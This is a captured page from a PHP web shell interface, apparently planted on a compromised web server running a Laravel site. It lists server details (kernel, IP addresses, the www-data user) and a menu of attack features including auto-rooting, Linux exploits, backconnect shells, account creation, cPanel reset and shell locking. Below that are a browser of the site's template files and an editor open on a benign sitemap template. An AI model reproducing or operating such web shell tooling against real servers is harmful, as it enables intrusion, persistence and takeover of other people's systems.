Linux localhost 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 23.92.16.63 | : 172.70.114.233
Cant Read [ /etc/named.conf ]
8.1.5
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
noahpromax.com /
source /
resources /
views /
[ HOME SHELL ]
Name
Size
Permission
Action
admin
[ DIR ]
drwxr-xr-x
client_panel
[ DIR ]
drwxr-xr-x
emails
[ DIR ]
drwxr-xr-x
errors
[ DIR ]
drwxr-xr-x
exports
[ DIR ]
drwxr-xr-x
layouts
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxr-xr-x
about_us.blade.php
113
B
-rw-r--r--
blogs.blade.php
3.89
KB
-rw-r--r--
contact_us.blade.php
9.79
KB
-rw-r--r--
index.blade.php
15.19
KB
-rw-r--r--
index_old.blade.php
940
B
-rw-r--r--
portfolio.blade.php
14.99
KB
-rw-r--r--
post.blade.php
4.18
KB
-rw-r--r--
practice_area.blade.php
2.1
KB
-rw-r--r--
privacy_security.blade.php
876
B
-rw-r--r--
projects.blade.php
1.68
KB
-rw-r--r--
review.blade.php
9.18
KB
-rw-r--r--
search.blade.php
13.68
KB
-rw-r--r--
service_detail.blade.php
2.88
KB
-rw-r--r--
services.blade.php
4.55
KB
-rw-r--r--
sitemap.blade.php
4.12
KB
-rw-r--r--
sitemapxml.blade.php
2.34
KB
-rw-r--r--
templates.blade.php
42.18
KB
-rw-r--r--
terms.blade.php
988
B
-rw-r--r--
thank_you.blade.php
1.07
KB
-rw-r--r--
welcome.blade.php
72.5
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : sitemap.blade.php
@extends('layouts.app') @section('contents') <?php if(isset($_GET['gclid'])){ $gclid=$_GET['gclid']; }else{ $gclid=''; } ?> <?php if(isset($_GET['MSCLKID'])){ $MSCLKID=$_GET['MSCLKID']; }else{ $MSCLKID=''; } ?> <style> .position_top{ background-color: black; } section { padding: 0px 0; } a{ color: black; text-decoration: none; } h4{ font-size:24px ; font-family: inherit; font-weight: 500; line-height: 1.1; color: inherit; margin-top: 10px; margin-bottom: 10px; } h3{ font-family: inherit; font-weight: 500; line-height: 1.1; color: inherit; font-size: 24px; } ul li{ padding: 6px; } .column { flex: 25%; max-width: 100%; padding: 0 15px; } .bullet-list { list-style-type: disc; /* Use 'disc' for filled bullets, 'circle' for open circles, 'square' for squares, etc. */ margin-left: 20px; /* Adjust the left margin as needed */ } </style> <!-- Page Title --> <section class="page-title centred" style="background-image: url({{'assets/images/background/page-title.jpg'}});"> <div class="auto-container"> <div class="content-box"> <div class="title"> <h1>Site Map</h1> </div> </div> </div> </div> </section> <!-- End Page Title --> <section> <div class="container py-5"> <div class="col-md-12 column sitemap-page"> <h3 class="text-dark"><i class="fa fa-home"></i> Noah ProMax</h3><hr> <div class="row clearfix mt-5"> <div class="col-md-4 column"> <ol class="mt-5" > <li class="fw-bold text-dark"><a href="{{url('/')}}" class="text-decoration-none">Home</a></li> <li class="fw-bold text-dark"><a href="{{url('about-us')}}">About Us</a> </li> <li class="fw-bold text-dark"><a href="{{url('practice-areas')}}">Practice Areas</a> </li> <li class="fw-bold text-dark"><a href="{{url('services')}}">Services</a> </li> <li class="fw-bold text-dark"><a href="{{url('contact-us')}}">Contact</a> </li> </ol> </div> <div class="col-md-4 column"> <p class="fw-bold text-dark"style="font-size: 30px">Practice Areas</p> <ol class="bullet-list mt-5 "> @foreach($PracticeAreas as $PracticeArea) <li><a href="{{url($PracticeArea->slug)}}" class="text-decoration-none">{{$PracticeArea->title}}</a></li> @endforeach </ol> <p class="fw-bold text-dark mt-5"style="font-size: 30px">Services</p> <ol class="bullet-list mt-5"> @foreach($services as $service) <li><a href="{{url($service->slug)}}" class="text-decoration-none">{{$service->title}}</a></li> @endforeach </ol> </div> <div class="col-md-4 column"> <p class="fw-bold text-dark"style="font-size: 30px">Other Pages</p> <ol class="mt-5"> <li class="fw-bold text-dark"><a href="{{url('privacy-security')}}">Privacy Policy</a></li> <li class="fw-bold text-dark"><a href="{{url('terms')}}">Terms & Conditions</a></li> </ol> </div> </div> <hr> </div> </div> </section> @endsection
Close